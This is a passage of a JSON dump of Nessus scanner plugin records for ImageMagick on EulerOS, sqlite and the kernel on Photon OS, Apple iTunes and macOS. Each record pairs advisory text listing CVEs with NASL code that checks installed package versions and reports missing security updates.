{"nessus": [{"lastseen": "2019-11-17T18:07:48", "bulletinFamily": "scanner", "description": "According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - ImageMagick is an image display and manipulation tool\n for the X Window System. ImageMagick can read and write\n JPEG, TIFF, PNM, GIF,and Photo CD image formats. It can\n resize, rotate, sharpen, color reduce, or add special\n effects to an image, and when finished you can either\n save the completed work in the original format or a\n different one. ImageMagick also includes command line\n programs for creating animated or transparent .gifs,\n creating composite images, creating thumbnail images,\n and more.ImageMagick is one of your choices if you need\n a program to manipulate and display images. If you want\n to develop your own applications which use ImageMagick\n code or APIs, you need to install ImageMagick-devel as\n well.Security Fix(es):In ImageMagick before 7.0.8-8, a\n NULL pointer dereference exists in the\n GetMagickProperty function in\n MagickCore/property.c.(CVE-2018-16329)ImageMagick\n before 6.9.9-24 and 7.x before 7.0.7-12 has a\n use-after-free in Magick::Image::read in\n Magick++/lib/Image.cpp.(CVE-2017-17499)In ImageMagick\n before 6.9.8-5 and 7.x before 7.0.5-6, there is a\n memory leak in the ReadMATImage function in\n coders/mat.c.(CVE-2017-13146)In ImageMagick before\n 6.9.7-6 and 7.x before 7.0.4-6, the ReadMATImage\n function in coders/mat.c uses uninitialized data, which\n might allow remote attackers to obtain sensitive\n information from process memory.(CVE-2017-13143)In\n ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1, the\n ReadOneMNGImage function in coders/png.c has an\n out-of-bounds read with the MNG CLIP\n chunk.(CVE-2017-13139)coders/psd.c in ImageMagick\n allows remote attackers to have unspecified impact via\n a crafted PSD file, which triggers an out-of-bounds\n write.(CVE-2017-5510)coders/psd.c in ImageMagick allows\n remote attackers to have unspecified impact via a\n crafted PSD file, which triggers an out-of-bounds\n write.(CVE-2017-5509)Memory leak in coders/mpc.c in\n ImageMagick before 6.9.7-4 and 7.x before 7.0.4-4\n allows remote attackers to cause a denial of service\n (memory consumption) via vectors involving a pixel\n cache.(CVE-2017-5507)Memory leak in the IsOptionMember\n function in MagickCore/option.c in ImageMagick before\n 6.9.2-2, as used in ODR-PadEnc and other products,\n allows attackers to trigger memory\n consumption.(CVE-2016-10252)Off-by-one error in\n coders/wpg.c in ImageMagick allows remote attackers to\n have unspecified impact via vectors related to a string\n copy.(CVE-2016-10145)Memory leak in\n AcquireVirtualMemory in ImageMagick before 7 allows\n remote attackers to cause a denial of service (memory\n consumption) via unspecified vectors.(CVE-2016-7539)In\n coders/bmp.c in ImageMagick before 7.0.8-16, an input\n file can result in an infinite loop and hang, with high\n CPU and memory consumption. Remote attackers could\n leverage this vulnerability to cause a denial of\n service via a crafted file.(CVE-2018-20467)In\n ImageMagick before 7.0.8-8, a NULL pointer dereference\n exists in the CheckEventLogging function in\n MagickCore/log.c.(CVE-2018-16328)ReadXBMImage in\n coders/xbm.c in ImageMagick before 7.0.8-9 leaves data\n uninitialized when processing an XBM file that has a\n negative pixel value. If the affected code is used as a\n library loaded into a process that includes sensitive\n information, that information sometimes can be leaked\n via the image data.(CVE-2018-16323)WriteEPTImage in\n coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote\n attackers to cause a denial of service\n (MagickCore/memory.c double free and application crash)\n or possibly have unspecified other impact via a crafted\n file.(CVE-2018-8804)In ImageMagick 7.0.8-3 Q16,\n ReadDIBImage and WriteDIBImage in coders/dib.c allow\n attackers to cause an out of bounds write via a crafted\n file.(CVE-2018-12600)ImageMagick version 7.0.7-2\n contains a memory leak in ReadYUVImage in\n coders/yuv.c.(CVE-2017-15033)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "published": "2019-11-12T00:00:00", "id": "EULEROS_SA-2019-2160.NASL", "href": "https://www.tenable.com/plugins/nessus/130869", "title": "EulerOS 2.0 SP5 : ImageMagick (EulerOS-SA-2019-2160)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130869);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2016-10145\",\n \"CVE-2016-10252\",\n \"CVE-2016-7539\",\n \"CVE-2017-13139\",\n \"CVE-2017-13143\",\n \"CVE-2017-13146\",\n \"CVE-2017-15033\",\n \"CVE-2017-17499\",\n \"CVE-2017-5507\",\n \"CVE-2017-5509\",\n \"CVE-2017-5510\",\n \"CVE-2018-12600\",\n \"CVE-2018-16323\",\n \"CVE-2018-16328\",\n \"CVE-2018-16329\",\n \"CVE-2018-20467\",\n \"CVE-2018-8804\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : ImageMagick (EulerOS-SA-2019-2160)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - ImageMagick is an image display and manipulation tool\n for the X Window System. ImageMagick can read and write\n JPEG, TIFF, PNM, GIF,and Photo CD image formats. It can\n resize, rotate, sharpen, color reduce, or add special\n effects to an image, and when finished you can either\n save the completed work in the original format or a\n different one. ImageMagick also includes command line\n programs for creating animated or transparent .gifs,\n creating composite images, creating thumbnail images,\n and more.ImageMagick is one of your choices if you need\n a program to manipulate and display images. If you want\n to develop your own applications which use ImageMagick\n code or APIs, you need to install ImageMagick-devel as\n well.Security Fix(es):In ImageMagick before 7.0.8-8, a\n NULL pointer dereference exists in the\n GetMagickProperty function in\n MagickCore/property.c.(CVE-2018-16329)ImageMagick\n before 6.9.9-24 and 7.x before 7.0.7-12 has a\n use-after-free in Magick::Image::read in\n Magick++/lib/Image.cpp.(CVE-2017-17499)In ImageMagick\n before 6.9.8-5 and 7.x before 7.0.5-6, there is a\n memory leak in the ReadMATImage function in\n coders/mat.c.(CVE-2017-13146)In ImageMagick before\n 6.9.7-6 and 7.x before 7.0.4-6, the ReadMATImage\n function in coders/mat.c uses uninitialized data, which\n might allow remote attackers to obtain sensitive\n information from process memory.(CVE-2017-13143)In\n ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1, the\n ReadOneMNGImage function in coders/png.c has an\n out-of-bounds read with the MNG CLIP\n chunk.(CVE-2017-13139)coders/psd.c in ImageMagick\n allows remote attackers to have unspecified impact via\n a crafted PSD file, which triggers an out-of-bounds\n write.(CVE-2017-5510)coders/psd.c in ImageMagick allows\n remote attackers to have unspecified impact via a\n crafted PSD file, which triggers an out-of-bounds\n write.(CVE-2017-5509)Memory leak in coders/mpc.c in\n ImageMagick before 6.9.7-4 and 7.x before 7.0.4-4\n allows remote attackers to cause a denial of service\n (memory consumption) via vectors involving a pixel\n cache.(CVE-2017-5507)Memory leak in the IsOptionMember\n function in MagickCore/option.c in ImageMagick before\n 6.9.2-2, as used in ODR-PadEnc and other products,\n allows attackers to trigger memory\n consumption.(CVE-2016-10252)Off-by-one error in\n coders/wpg.c in ImageMagick allows remote attackers to\n have unspecified impact via vectors related to a string\n copy.(CVE-2016-10145)Memory leak in\n AcquireVirtualMemory in ImageMagick before 7 allows\n remote attackers to cause a denial of service (memory\n consumption) via unspecified vectors.(CVE-2016-7539)In\n coders/bmp.c in ImageMagick before 7.0.8-16, an input\n file can result in an infinite loop and hang, with high\n CPU and memory consumption. Remote attackers could\n leverage this vulnerability to cause a denial of\n service via a crafted file.(CVE-2018-20467)In\n ImageMagick before 7.0.8-8, a NULL pointer dereference\n exists in the CheckEventLogging function in\n MagickCore/log.c.(CVE-2018-16328)ReadXBMImage in\n coders/xbm.c in ImageMagick before 7.0.8-9 leaves data\n uninitialized when processing an XBM file that has a\n negative pixel value. If the affected code is used as a\n library loaded into a process that includes sensitive\n information, that information sometimes can be leaked\n via the image data.(CVE-2018-16323)WriteEPTImage in\n coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote\n attackers to cause a denial of service\n (MagickCore/memory.c double free and application crash)\n or possibly have unspecified other impact via a crafted\n file.(CVE-2018-8804)In ImageMagick 7.0.8-3 Q16,\n ReadDIBImage and WriteDIBImage in coders/dib.c allow\n attackers to cause an out of bounds write via a crafted\n file.(CVE-2018-12600)ImageMagick version 7.0.7-2\n contains a memory leak in ReadYUVImage in\n coders/yuv.c.(CVE-2017-15033)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2160\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?65bf07e6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ImageMagick packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"ImageMagick-6.9.9.38-3.h11.eulerosv2r7\",\n \"ImageMagick-c++-6.9.9.38-3.h11.eulerosv2r7\",\n \"ImageMagick-libs-6.9.9.38-3.h11.eulerosv2r7\",\n \"ImageMagick-perl-6.9.9.38-3.h11.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:10:07", "bulletinFamily": "scanner", "description": "An update of the sqlite package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2019-2_0-0157_SQLITE.NASL", "href": "https://www.tenable.com/plugins/nessus/124681", "published": "2019-05-08T00:00:00", "title": "Photon OS 2.0: Sqlite PHSA-2019-2.0-0157", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-2.0-0157. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124681);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/05/08 5:40:36\");\n\n script_cve_id(\"CVE-2019-9937\");\n\n script_name(english:\"Photon OS 2.0: Sqlite PHSA-2019-2.0-0157\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the sqlite package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-157.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0211\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-3.27.2-2.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-debuginfo-3.27.2-2.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-devel-3.27.2-2.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-libs-3.27.2-2.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sqlite\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:09:00", "bulletinFamily": "scanner", "description": "An update of the linux package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2017-0025_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121716", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2017-0025", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0025. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121716);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-11176\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2017-0025\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-55.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10989\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.77-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T11:30:33", "bulletinFamily": "scanner", "description": "The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.3. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT209450 advisory:\n\n - Multiple vulnerabilities exist due to input processing\n flaws in the WebKit component. An attacker may be able\n to leverage one of these vulnerability, by providing\n maliciously crafted web content, to execute arbitrary\n code on the host. (CVE-2019-6212, CVE-2019-6215,\n CVE-2019-6216, CVE-2019-6217, CVE-2019-6226,\n CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - A universal cross-site scripting vulnerability exists in\n the WebKit component. An attacker may be able to leverage\n this vulnerability, by providing maliciously crafted web\n content, to execute arbitrary script code in the security\n context of any site. (CVE-2019-6229)\n\n - A memory corruption vulnerability exists in the\n AppleKeyStore component. An attacker may be able to\n leverage this vulnerability to allow a process to\n circumvent sandbox restrictions. (CVE-2019-6235)\n\n - An out-of-bounds read vulnerability exists in the\n Core Media component. An attacker may be able to leverage\n this vulnerability to allow a malicious application to\n elevate its privileges. (CVE-2019-6221)\n\n - Multiple memory corruption issues exist in the SQLite\n component. An attacker may be able to leverage these\n vulnerabilities, by executing a malicious SQL query, to\n execute arbitrary code on the host. (CVE-2018-20346,\n CVE-2018-20505, CVE-2018-20506)\n\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application", "modified": "2019-11-02T00:00:00", "id": "ITUNES_12_9_3.NASL", "href": "https://www.tenable.com/plugins/nessus/121473", "published": "2019-01-30T00:00:00", "title": "Apple iTunes < 12.9.3 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121473);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2018-20346\",\n \"CVE-2018-20505\",\n \"CVE-2018-20506\",\n \"CVE-2019-6212\",\n \"CVE-2019-6215\",\n \"CVE-2019-6216\",\n \"CVE-2019-6217\",\n \"CVE-2019-6221\",\n \"CVE-2019-6226\",\n \"CVE-2019-6227\",\n \"CVE-2019-6229\",\n \"CVE-2019-6233\",\n \"CVE-2019-6234\",\n \"CVE-2019-6235\"\n );\n script_bugtraq_id(\n 106323,\n 106691,\n 106694,\n 106696,\n 106698,\n 106699,\n 106724\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-1-24-1\");\n\n script_name(english:\"Apple iTunes < 12.9.3 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on remote host is affected by multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.3. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT209450 advisory:\n\n - Multiple vulnerabilities exist due to input processing\n flaws in the WebKit component. An attacker may be able\n to leverage one of these vulnerability, by providing\n maliciously crafted web content, to execute arbitrary\n code on the host. (CVE-2019-6212, CVE-2019-6215,\n CVE-2019-6216, CVE-2019-6217, CVE-2019-6226,\n CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - A universal cross-site scripting vulnerability exists in\n the WebKit component. An attacker may be able to leverage\n this vulnerability, by providing maliciously crafted web\n content, to execute arbitrary script code in the security\n context of any site. (CVE-2019-6229)\n\n - A memory corruption vulnerability exists in the\n AppleKeyStore component. An attacker may be able to\n leverage this vulnerability to allow a process to\n circumvent sandbox restrictions. (CVE-2019-6235)\n\n - An out-of-bounds read vulnerability exists in the\n Core Media component. An attacker may be able to leverage\n this vulnerability to allow a malicious application to\n elevate its privileges. (CVE-2019-6221)\n\n - Multiple memory corruption issues exist in the SQLite\n component. An attacker may be able to leverage these\n vulnerabilities, by executing a malicious SQL query, to\n execute arbitrary code on the host. (CVE-2018-20346,\n CVE-2018-20505, CVE-2018-20506)\n\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209450\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.9.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\nconstraints = [{\"fixed_version\":\"12.9.3\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T11:31:07", "bulletinFamily": "scanner", "description": "The remote host is running a version of macOS / Mac OS X that is\n10.14.x prior to 10.14.3. It is, therefore, affected by multiple\nvulnerabilities related to the following components:\n\n - AppleKeyStore\n - Bluetooth\n - Core Media\n - CoreAnimation\n - FaceTime\n - IOKit\n - Kernel\n - libxpc\n - Natural Language Processing\n - QuartzCore\n - SQLite\n - WebRTC\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "modified": "2019-11-02T00:00:00", "id": "MACOS_10_14_3.NASL", "href": "https://www.tenable.com/plugins/nessus/121393", "published": "2019-01-25T00:00:00", "title": "macOS 10.14.x < 10.14.3 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121393);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\n \"CVE-2018-20346\",\n \"CVE-2018-20505\",\n \"CVE-2018-20506\",\n \"CVE-2019-6200\",\n \"CVE-2019-6202\",\n \"CVE-2019-6205\",\n \"CVE-2019-6208\",\n \"CVE-2019-6209\",\n \"CVE-2019-6210\",\n 